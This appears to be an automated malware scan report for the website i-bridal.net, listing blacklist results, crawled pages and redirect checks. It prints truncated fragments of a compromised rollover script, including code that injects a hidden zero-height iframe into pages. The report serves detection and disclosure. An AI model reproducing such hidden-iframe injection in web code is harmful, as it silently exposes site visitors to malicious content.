Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=i-bridal.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://i-bridal.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://i-bridal.net/ | 200 OK Content-Length: 9192 Content-Type: text/html | clean |
http://i-bridal.net/./common/js/smartRollover.js | 200 OK Content-Length: 8094 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function smartRollover() { if(document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for(var i=0; i < images.length; i++) { if(images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function() { this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on.")); } images[i].onmouseout = function() { this.setAttribute("src", this.getAttribute("src").replace("_on.", "_ if(f)e(s);} Decoded script: function smartRollover() { if (document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for (var i = 0; i < images.length; i++) { if (images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function () {this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on."));}; images[i].onmouseout = function () {this.setAttribute("src", this.getAttribute( ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://i-bridal.net/0101_service.html | 200 OK Content-Length: 10689 Content-Type: text/html | clean |
http://i-bridal.net/common/js/smartRollover.js | 200 OK Content-Length: 8094 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function smartRollover() { if(document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for(var i=0; i < images.length; i++) { if(images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function() { this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on.")); } images[i].onmouseout = function() { this.setAttribute("src", this.getAttribute("src").replace("_on.", "_ if(f)e(s);} Decoded script: function smartRollover() { if (document.getElementsByTagName) { var images = document.getElementsByTagName("img"); for (var i = 0; i < images.length; i++) { if (images[i].getAttribute("src").match("_off.")) { images[i].onmouseover = function () {this.setAttribute("src", this.getAttribute("src").replace("_off.", "_on."));}; images[i].onmouseout = function () {this.setAttribute("src", this.getAttribute( ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://i-bridal.net/index.html | 200 OK Content-Length: 9192 Content-Type: text/html | clean |
http://i-bridal.net/0201_sample.html | 200 OK Content-Length: 7820 Content-Type: text/html | clean |
http://i-bridal.net/0301_price.html | 200 OK Content-Length: 9002 Content-Type: text/html | clean |
http://i-bridal.net/0401_appli.html | 200 OK Content-Length: 9168 Content-Type: text/html | clean |
http://i-bridal.net/0501_qa.html | 200 OK Content-Length: 13700 Content-Type: text/html | clean |
http://i-bridal.net/0601_inq.html | 200 OK Content-Length: 5269 Content-Type: text/html | clean |
http://i-bridal.net/1001_guide.html | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://i-bridal.net/test404page.js | 404 Not Found Content-Length: 289 Content-Type: text/html | clean |
http://i-bridal.net/1002_privacy.html | 200 OK Content-Length: 6360 Content-Type: text/html | clean |
http://i-bridal.net/1003_rule.html | 200 OK Content-Length: 12838 Content-Type: text/html | clean |
http://i-bridal.net/0402_appliform.html | 200 OK Content-Length: 18439 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: i-bridal.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 01:25:19 GMT
Accept-Ranges: bytes
ETag: "cc681a1-23e8-493be8ad31040"
Server: Apache/2.2.3 (CentOS)
Content-Length: 9192
Content-Type: text/html
Last-Modified: Fri, 29 Oct 2010 10:01:29 GMT
X-Powered-By: PleskLin
...9192 bytes of data.
GET / HTTP/1.1
Host: i-bridal.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 01:25:19 GMT
Accept-Ranges: bytes
ETag: "cc681a1-23e8-493be8ad31040"
Server: Apache/2.2.3 (CentOS)
Content-Length: 9192
Content-Type: text/html
Last-Modified: Fri, 29 Oct 2010 10:01:29 GMT
X-Powered-By: PleskLin
...9192 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: i-bridal.net
Referer: http://www.google.com/search?q=i-bridal.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: i-bridal.net
Referer: http://www.google.com/search?q=i-bridal.net
Result:
The result is similar to the first query. There are no suspicious redirects found.